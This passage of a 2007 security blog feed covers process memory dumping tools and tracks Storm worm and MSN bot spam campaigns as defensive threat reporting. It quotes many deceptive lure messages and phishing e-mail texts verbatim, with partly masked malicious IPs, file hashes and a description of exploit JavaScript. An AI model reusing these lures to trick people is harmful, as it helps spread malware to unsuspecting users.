/F&amp;#58;none to completely suppress dump&lt;br /&gt;        /B&amp;#58;filename     - Output file for the binary contents of memory&lt;br /&gt;&lt;br /&gt; Notes&amp;#58; Both 'Address' and 'Length' can be expressed in hexadecimal format&lt;br /&gt;        with '0x' prefix. The 'Length' field can be also expressed in decimal&lt;br /&gt;        Examples&amp;#58;&lt;br /&gt;&lt;br /&gt;          MEMDUMP /DW&amp;#58;0x100000,0x100000 /F&amp;#58;2ndMB.dmp - dump second MB to file&lt;br /&gt;          MEMDUMP /DB&amp;#58;0x100000,128                   - dump 128 Bytes to CON&amp;#58;&lt;br /&gt;          MEMDUMP /D&amp;#58;0,0x100 /F&amp;#58;none /B&amp;#58;IntTB.bin    - copy INT table to file&lt;br /&gt;&lt;br /&gt;        If dump or binary file exists, MEMDUMP unconditionally overrides it.&lt;br /&gt;&lt;br /&gt;        If you are using WORD or DWORD access 'Length' parameter should be&lt;br /&gt;        multiple of 2 or 4 correspondingly.&lt;br /&gt;&lt;br /&gt;        Please remember that if the memory manager &amp;#40;such as EMM386.EXE&amp;#41; is&lt;br /&gt;        loaded, MEMDUMP will read linear address rather as physical address.&lt;/pre&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;There is almost no help for the &lt;a href="http://metasploit.com" target="_blank" title="http://metasploit.com" class="postlink" rel="nofollow"&gt;Metasploit&lt;/a&gt; memdump. It dumps specific processes by giving it a PID and creates quite a few files that are to be analyzed with msfpescan. The file names looks to be based on the section of memory it is pulled from. Msfpescan is crashing on my Mac OS X box right now so can't show you the output but here is the syntax and sample of memdump running.&lt;br /&gt;&lt;blockquote&gt;&lt;table width="90%" cellspacing="1" cellpadding="3" border="0" align="center"&gt; &lt;td class="code"&gt;&lt;code&gt;&lt;pre&gt;&lt;br /&gt;C&amp;#58;\&amp;gt;y&amp;#58;\memdump.exe&lt;br /&gt;Usage&amp;#58; y&amp;#58;\memdump.exe pid &amp;#91;dump directory&amp;#93;&lt;br /&gt;&lt;br /&gt;C&amp;#58;\&amp;gt;y&amp;#58;\memdump.exe 2796&lt;br /&gt;&amp;#91;*&amp;#93; Creating dump directory...2796&lt;br /&gt;&amp;#91;*&amp;#93; Attaching to 2796...&lt;br /&gt;&amp;#91;*&amp;#93; Dumping segments...&lt;br /&gt;&amp;#91;*&amp;#93; Dump completed successfully, 49 segments.&lt;br /&gt;&lt;/pre&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Then, there is &lt;a href="http://ntsecurity.nu/toolbox/pmdump/" target="_blank" title="http://ntsecurity.nu/toolbox/pmdump/" class="postlink" rel="nofollow"&gt;pmdump&lt;/a&gt; that also dumps processes.&lt;br /&gt;&lt;table width="90%" cellspacing="1" cellpadding="3" border="0" align="center"&gt;&lt;br /&gt; &lt;td class="code"&gt;&lt;code&gt;&lt;pre&gt;&lt;br /&gt;pmdump 1.2 - &amp;#40;c&amp;#41; 2002, Arne Vidstrom &amp;#40;arne.vidstrom@ntsecurity.nu&amp;#41;&lt;br /&gt;           - http&amp;#58;//ntsecurity.nu/toolbox/pmdump/&lt;br /&gt;&lt;br /&gt;Usage&amp;#58; pmdump &amp;lt;pid&amp;gt; &amp;lt;filename&amp;gt;&lt;br /&gt;        - dumps the process memory contents to a file&lt;br /&gt;&lt;br /&gt;       pmdump -list&lt;br /&gt;        - lists all running processes and their PID's&lt;br /&gt;&lt;/pre&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Microsoft has several versions of userdump but I think the latest is &lt;a href="http://www.microsoft.com/downloads/details.aspx?familyid=E23CD741-D222-48DF-9CD8-28796F414256&amp;amp;displaylang=en" target="_blank" title="http://www.microsoft.com/downloads/details.aspx?familyid=E23CD741-D222-48DF-9CD8-28796F414256&amp;amp;displaylang=en" class="postlink" rel="nofollow"&gt;version 8.0 and is less than a month old&lt;/a&gt;. As with Metasploits memdump, there is another tool that can read the dumped output. Dumpcheck is that tool and is part of the &lt;a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx" target="_blank" title="http://www.microsoft.com/whdc/devtools/debugging/default.mspx" class="postlink" rel="nofollow"&gt;debugging tools package&lt;/a&gt;. For it to be most useful, you need the symbols, also.&lt;br /&gt;&lt;blockquote&gt;&lt;table width="90%" cellspacing="1" cellpadding="3" border="0" align="center"&gt;&lt;br /&gt; &lt;td class="code"&gt;&lt;code&gt;&lt;pre&gt;&lt;br /&gt;User Mode Process Dumper &amp;#40;Version 8.0.2826.0&amp;#41;&lt;br /&gt;Copyright &amp;#40;c&amp;#41; 1999-2005 Microsoft Corp. All rights reserved.&lt;br /&gt;&lt;br /&gt;userdump -p&lt;br /&gt;    Displays a list of running processes and process IDs.&lt;br /&gt;&lt;br /&gt;userdump &amp;#91;-k&amp;#93; &amp;lt;ProcessSpec&amp;gt; &amp;#91;&amp;lt;TargetDumpFile&amp;gt;&amp;#93;&lt;br /&gt;    Dumps one process or processes that share an image binary file name.&lt;br /&gt;&lt;br /&gt;    -k optionally causes processes to be killed after being dumped.&lt;br /&gt;&lt;br /&gt;    &amp;lt;ProcessSpec&amp;gt; is a decimal or 0x-prefixed hex process ID, or the&lt;br /&gt;        base name and extension &amp;#40;no path&amp;#41; of the image file used to create&lt;br /&gt;        a process.&lt;br /&gt;&lt;br /&gt;    &amp;lt;TargetDumpFile&amp;gt; is a legal Win32 file specification. If not specified,&lt;br /&gt;        dump files are generated in the current directory using a name&lt;br /&gt;        based on the image file name.&lt;br /&gt;&lt;br /&gt;userdump -m &amp;#91;-k&amp;#93; &amp;lt;ProcessSpec&amp;gt; &amp;#91;&amp;lt;ProcessSpec&amp;gt;...&amp;#93; &amp;#91;-d &amp;lt;TargetDumpPath&amp;gt;&amp;#93;&lt;br /&gt;    Same as above, except dumps multiple processes.&lt;br /&gt;&lt;br /&gt;    -d &amp;lt;TargetDumpPath&amp;gt; supplies the directory where the dumps will go.&lt;br /&gt;        The default is the current directory.&lt;br /&gt;&lt;br /&gt;userdump -g &amp;#91;-k&amp;#93; &amp;#91;-d &amp;lt;TargetDumpPath&amp;gt;&amp;#93;&lt;br /&gt;    Similar to above, except dumps Win32 GUI apps that appear hang.&lt;br /&gt;&lt;br /&gt;userdump -I &amp;#91;-d &amp;lt;TargetDumpPath&amp;gt;&amp;#93;&lt;br /&gt;    To change just in time debugger to UserDump.&lt;br /&gt;    This command will not actually start UserDump.&lt;br /&gt;    If you don't setup userdump, please copy userdump.exe to %windir%\system32.&lt;br /&gt;&lt;br /&gt;    -d &amp;lt;TargetDumpPath&amp;gt; supplies the directory where the dumps will go.&lt;br /&gt;        The default is a current directory of the target process.&lt;br /&gt;&lt;/pre&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/blockquote&gt;&lt;br /&gt;That's it that I can think of for now. I will probably remember the other one or two tonight. Hope all that helps give you some direction and a realization that there is no specific way to analyze memory, but quite a few people are interested and several smart people are doing some excellent research into the area.</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/process-memory-dumping-tools.html' title='Process memory dumping tools'/><link rel='related' href='http://www.forensicfocus.com/index.php?name=Forums&amp;file=viewtopic&amp;t=677' title='Process memory dumping tools'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=8238982151356190852' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/8238982151356190852'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/8238982151356190852'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-42807403282466334</id><published>2007-09-18T10:58:00.000-04:00</published><updated>2007-09-20T16:54:16.740-04:00</updated><title type='text'>MSN bot making the rounds</title><content type='html'>It has handy commands like main.wget, main.remove, msn.url, msn.self and msn.stop.&lt;br /&gt;&lt;br /&gt;If you get one of the following and it includes a link to a site like photobucket.com or similar, don't click it. This came straight from a txt file an IRC bot was using as its source of deceptive messages being sent to MSN users.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;This picture isnt you... right?&lt;br /&gt;Wow i think i found your pic on myspace!&lt;br /&gt;hey did i ever show you this picture of me?  &lt;br /&gt;can i up some of these pics of ya to my myspace profile?&lt;br /&gt;you care if i put this pictuer of you in my new album?&lt;br /&gt;sry about the messup i fixed the pic! Try it one more time plz&lt;br /&gt;Can i put this pic of you into my new myspace album?&lt;br /&gt;this looks like you lol&lt;br /&gt;haha this guy up my street just slammed his $90k car into a telephone pole! I got a pic of it with my cellphone&lt;br /&gt;Wanna see my pics before i send em to facebook?&lt;br /&gt;do you think this picture is too kinky for Myspace? &lt;br /&gt;I think this picture is terrible. but my friends on myspace want to see it. please dont show noone.&lt;br /&gt;Have you seen me Naked Yet :D&lt;br /&gt;ok I DO NOT like my new hair color.. but people on facebook do. what do you think? And no laughing! lol&lt;br /&gt;hey you got a myspace album? anyways heres my new myspace album :) accept k?&lt;br /&gt;do I look dumb in this picture? I want to put it on myspace.&lt;br /&gt;&lt;/blockquote&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/msn-bot-making-rounds.html' title='MSN bot making the rounds'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=42807403282466334' title='1 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/42807403282466334'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/42807403282466334'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-7348284265553375499</id><published>2007-09-15T17:09:00.000-04:00</published><updated>2007-09-15T17:43:42.210-04:00</updated><title type='text'>Storm brings "games" that pack a punch</title><content type='html'>Today, Storm includes e-mails about free games available. The e-mails are resorting back to including URLs to IP addresses and not a domain like the most recent NFL messages. The web page includes pictures of all sorts of games and links to "ArcadeWorld.exe".&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;a href="http://www.johnhsawyer.com/files/storm-games.png" &gt;&lt;img src="http://www.johnhsawyer.com/files/storm-games_sm.png" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;The Storm worm folks are also resorting to including exploit code. My guess is they just didn't get the number of infections they were hoping to with just including links to the *.exe with the NFL version.&lt;br /&gt;Here's a screenshot of the obfuscated javascript.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/files/storm-game-js1.png" border="0"&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;This is after the first round of deobfuscating the javascript using SpiderMonkey. See how there's still more to analyze. The overly long filename for the WMV file looks like it is targeting MS06-006.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/files/storm-game-deob1.png" border="0"&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;The do/while loop creates a string of 16,777,216 A's that gets the shellcode appended to the end.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/files/storm-game-deob2.png" border="0"&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Quick, grab this&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Click here to get over 1000 games for free http://xxx.0.188.5/&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Quick, grab this&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Stop paying for games; we have over 1000 games for free online http://xx.57.250.77/&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Thousands of hours of fun, for free&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Go http://xx.203.41.160/&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Stop paying for games&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; 1000 Online Free games, take a look http://xx.38.52.177/&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; The internet just got better&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Look http://xxx.54.195.27/&lt;br /&gt;&lt;/blockquote&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/storm-brings-games-that-pack-punch.html' title='Storm brings &quot;games&quot; that pack a punch'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=7348284265553375499' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/7348284265553375499'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/7348284265553375499'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-531884252067173018</id><published>2007-09-13T14:02:00.000-04:00</published><updated>2007-09-13T14:03:12.989-04:00</updated><title type='text'>freeNFLtracker.com now in use by Storm worm</title><content type='html'>Messages just started pouring in with links to http://freeNFLtracker.com/ instead of individual IP addresses. If you can blackhole the DNS, do so immediately to prevent users from being able to resolve the domain.&lt;br /&gt;&lt;br /&gt;There is still no exploit code in the webpage, but it probably won't be long before it is included. I'm guessing the current page is so effective at getting users to click and run that there isn't a need for automatic exploitation.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Are you ready for football season?&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Want to know all the stats all the time this season? Get your free NFL Season Tracker!&lt;br /&gt;http://freeNFLtracker.com/&lt;br /&gt;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Are you ready for football season?&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Are you ready for tonight's game? How about the whole season? Do you have your NFL Season Tracker?&lt;br /&gt;http://freeNFLtracker.com/&lt;br /&gt;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; The season has started&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Know every player and every stat, with this years Real-time NFL Tracker.&lt;br /&gt;http://freeNFLtracker.com/&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Here's the registrar info for FREENFLTRACKER.COM. For obvious reasons, they're using a privacy service to block the real registrant info.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;Registration Service Provided By: LOMTI INC.&lt;br /&gt;Contact: +351.3456712&lt;br /&gt;&lt;br /&gt;Domain Name: FREENFLTRACKER.COM&lt;br /&gt;&lt;br /&gt;Registrant:&lt;br /&gt;    PrivacyProtect.org&lt;br /&gt;    Domain Admin        (contact@privacyprotect.org)&lt;br /&gt;    P.O. Box 65&lt;br /&gt;    All Postal Mails Rejected, visit Privacyprotect.org&lt;br /&gt;    Monster&lt;br /&gt;    null,2680 AB&lt;br /&gt;    NL&lt;br /&gt;    Tel. +45.36946676&lt;br /&gt;&lt;br /&gt;Creation Date: 13-Sep-2007&lt;br /&gt;Expiration Date: 13-Sep-2008&lt;br /&gt;&lt;br /&gt;Domain servers in listed order:&lt;br /&gt;    ns13.freenfltracker.com&lt;br /&gt;    ns12.freenfltracker.com&lt;br /&gt;    ns11.freenfltracker.com&lt;br /&gt;    ns10.freenfltracker.com&lt;br /&gt;    ns9.freenfltracker.com&lt;br /&gt;    ns8.freenfltracker.com&lt;br /&gt;    ns7.freenfltracker.com&lt;br /&gt;    ns6.freenfltracker.com&lt;br /&gt;    ns5.freenfltracker.com&lt;br /&gt;    ns4.freenfltracker.com&lt;br /&gt;    ns3.freenfltracker.com&lt;br /&gt;    ns2.freenfltracker.com&lt;br /&gt;&lt;/blockquote&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/freenfltrackercom-now-in-use-by-storm.html' title='freeNFLtracker.com now in use by Storm worm'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=531884252067173018' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/531884252067173018'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/531884252067173018'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-2744301232947682475</id><published>2007-09-08T16:53:00.000-04:00</published><updated>2007-09-08T19:59:19.544-04:00</updated><title type='text'>Go! Fight! Storm..uhm..Score!</title><content type='html'>Just in time for football season, Storm worm is now targeting football fans with a free  online game tracker. The page is much more elaborate than any of the others so far with more graphics, a table and an image map. Every link on the page goes to "tracker.exe" and there is &lt;span style="font-weight:bold;"&gt;no&lt;/span&gt; obfuscated javascript or exploit code in the page itself. It is solely relying on users to click and run the "tracker.exe".&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/files/storm-football.png" border="0" width="500"&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Subject:&lt;/span&gt; FOOTBALL! Are You ready?&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Body:&lt;/span&gt; Football Season Is Finally here!&lt;br /&gt;Never miss a game again, and know all the stats.&lt;br /&gt;Get you data online everyday from our free game tracker:&lt;br /&gt;http://xx.179.106.14/&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Subject:&lt;/span&gt; Free NFL Game Tracker&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Body:&lt;/span&gt; Are you ready for some football?&lt;br /&gt;Let us keep you on top of every game everyday.&lt;br /&gt;Never be in the dark again with this online game tracker:&lt;br /&gt;http://xx.8.83.172/&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Subject:&lt;/span&gt; Do you have your NFL Game List?&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Body:&lt;/span&gt; Football is back, Life may resume again!&lt;br /&gt;We can keep you on top of every single game this season.&lt;br /&gt;Get all your game info daily from our online game tracker:&lt;br /&gt;http://xx.248.200.167/&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Subject:&lt;/span&gt; Are you ready for some football?&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Body:&lt;/span&gt; Life as we know it is back, NFL season is open.&lt;br /&gt;Let us keep you on top of every game everyday.&lt;br /&gt;Get all your game info daily from our online game tracker:&lt;br /&gt;http://xx.211.219.222/&lt;br /&gt;&lt;/blockquote&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/go-fight-stormuhmscore.html' title='Go! Fight! Storm..uhm..Score!'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=2744301232947682475' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/2744301232947682475'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/2744301232947682475'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-5146004675376299583</id><published>2007-09-06T09:22:00.000-04:00</published><updated>2007-09-06T09:36:37.775-04:00</updated><title type='text'>sTORm preying on file sharers</title><content type='html'>This came in at 7:02am this morning after about two days of nothing new from Storm. Now they are promoting Tor for file sharers to protect themselves from "Big Brother." &lt;a href="http://tor.eff.org/"&gt;Tor&lt;/a&gt; anonymizes online activity by encrypting and tunneling network traffic through random Tor exit nodes all around the world. It is nice to see Tor getting some recognition, but hopefully, it won't lead to too many new infections.&lt;br /&gt;&lt;br /&gt;Here's a copy of the e-mail and a screenshot of the page.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Subject:&lt;/span&gt; Big brother is watching you.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Body:&lt;/span&gt; Do you trade files online? Then they will come after you. The news is full of articles of lawsuits by the RIAA. This program protects your online identity. Save yourself from an attack and use this free software now. &lt;a href="http://xxx.78.78.190/"&gt;Download Tor&lt;/a&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/files/storm-Tor.png" border="0"&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/storm-preying-on-file-sharers.html' title='sTORm preying on file sharers'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=5146004675376299583' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/5146004675376299583'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/5146004675376299583'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-6196153212202398742</id><published>2007-09-04T16:52:00.000-04:00</published><updated>2007-09-04T17:05:04.401-04:00</updated><title type='text'>A Stormy Labor Day celebration</title><content type='html'>I did have a stormy Labor Day weekend in Hilton Head over the long holiday weekend, but my Inbox also received new copies of Storm worm hoping to trick users into infecting themselves. They either tell users they have a new e-card or there is a holiday greeting card waiting for them. The host with the malicious content has a cute Labor Day picture that links to "labor.exe"&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/files/storm-labor.jpg" border="0"&gt;&lt;br /&gt;All the same nasty obfuscated Javascript exploit code is still there and doesn't appear to have changed from what we were seeing last week.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;Subject: Happy Labor Day&lt;br /&gt;Body: Someone has sent you an E-Card. To view it, follow this link: http://ecards.com/funcard/edelivery?xz2dl2ifbi6r80hzk&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;Subject: The Big Labor Day Weekend&lt;br /&gt;Body: Here is the link to view your holiday greeting online: http://hallmark.com/ecards/labor1?j7hesyq65ubntze680a1p67969wt2&lt;br /&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;br /&gt;Subject: Your friend has sent you a card.&lt;br /&gt;Body: Click here to pick up your greeting card: http://netcards.com/cards/edelivery?p9n2q90enz4afj0&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;I do most of my javascript deobfuscation using &lt;a href="http://handlers.sans.org/dwesemann/decode/index.html"&gt;technique #4&lt;/a&gt; as detailed by Daniel Wesemann on the SANS Internet Storm Center site (&lt;a href="http://isc.sans.org"&gt;http://isc.sans.org&lt;/a&gt;). I'll probably go over how I do it in a little more detail in an upcoming post.</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/stormy-labor-day-celebration.html' title='A Stormy Labor Day celebration'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=6196153212202398742' title='2 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6196153212202398742'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6196153212202398742'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-6395718470021908103</id><published>2007-08-30T11:22:00.000-04:00</published><updated>2007-08-30T11:30:32.666-04:00</updated><title type='text'>Quick template mod</title><content type='html'>I had to mod the Blogger template because it was feeling a bit restrictive and making the long posts scroll. Personally, I read blogs through Google Reader but there is still a lot of people that go straight to the blog site so this should make it easier for all of you.&lt;br /&gt;&lt;br /&gt;Also, I was thinking of changing the title of the blog. Right now, it is "John H. Sawyer" which is because I'm too lazy to have come up with an original one. My &lt;a href="http://www.darkreading.com/blog.asp?blog_sectionid=447"&gt;DarkReading blog&lt;/a&gt; is called "Evil Bits" which Ben told me yesterday should be called "Naughty Bits." ;-) Thanks, Ben. Any ideas for blog titles?</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/08/quick-template-mod.html' title='Quick template mod'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=6395718470021908103' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6395718470021908103'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6395718470021908103'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-830557189262091301</id><published>2007-08-29T10:45:00.000-04:00</published><updated>2007-08-29T11:45:41.641-04:00</updated><title type='text'>Rock bands get a little Storm love</title><content type='html'>Whether that is good or bad, I'm sure it's going to make some college students and teens want to click on it. Two messages made it through this morning (see below). Today's Storm executable is "codec.exe". Even though the Storm worm host is serving up "codec.exe" as the current trick to get users to install (if they don't get owned by the embedded exploits first), it still usually hosts other EXE's based on previously seen names like "applet.exe", "video.exe", etc. The obfuscated javascript and exploits look to be the same as yesterday.&lt;br /&gt;&lt;br /&gt;On this host, I was able to pull both "video.exe" and "codec.exe" but not "applet.exe"--at least, not a Storm binary. (I didn't bother trying the other half dozen filenames used in the past).&lt;br /&gt;&lt;br /&gt;Here's there file sizes, md5's and content of the page returned by the "applet.exe" request.&lt;br /&gt;&lt;blockquote&gt;140367 Aug 29 10:52 codec.exe&lt;br /&gt;140367 Aug 29 10:52 video.exe&lt;br /&gt;529 Aug 29 10:52 applet.exe&lt;br /&gt;&lt;br /&gt;MD5 (applet.exe) = 37fe7efbebfe417c25a92f76d163ea3b&lt;br /&gt;MD5 (codec.exe) = 1ef03f4830c530799c57d67e1ccadc59&lt;br /&gt;MD5 (video.exe) = 1ef03f4830c530799c57d67e1ccadc59&lt;br /&gt;&lt;br /&gt;applet.exe: HTML document text&lt;br /&gt;codec.exe:  MS-DOS executable (EXE), OS/2 or MS Windows&lt;br /&gt;video.exe:  MS-DOS executable (EXE), OS/2 or MS Windows&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Page content returned from "applet.exe" request.&lt;blockquote&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;404 Not Found&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;body bgcolor="white"&amp;gt;&lt;br /&gt;&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;404 Not Found&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;nginx/0.5.17&amp;lt;/center&amp;gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&amp;lt;!-- The padding to disable MSIE's friendly error page --&amp;gt;&lt;br /&gt;&amp;lt;!-- The padding to disable MSIE's friendly error page --&amp;gt;&lt;br /&gt;&amp;lt;!-- The padding to disable MSIE's friendly error page --&amp;gt;&lt;br /&gt;&amp;lt;!-- The padding to disable MSIE's friendly error page --&amp;gt;&lt;br /&gt;&amp;lt;!-- The padding to disable MSIE's friendly error page --&amp;gt;&lt;br /&gt;&amp;lt;!-- The padding to disable MSIE's friendly error page --&amp;gt;&lt;/blockquote&gt;&lt;br /&gt;And, here's the content of the new e-mails.&lt;br /&gt;&lt;blockquote&gt;Subject: Hot new video&lt;br /&gt;Body: Foo Fighters just made a video you have got to see.&lt;br /&gt;&lt;br /&gt;Be the first to see it. Click on the link to pull it off my server:&lt;br /&gt;http://xx.25.176.66/&lt;br /&gt;&lt;/blockquote&gt;and&lt;blockquote&gt;&lt;br /&gt;Subject: this video rockx&lt;br /&gt;Body: Velvet Revolver &lt;br /&gt;Check it out first. Go here for the video: http://xx.106.206.111/&lt;/blockquote&gt;&lt;br /&gt;Just got this one...&lt;br 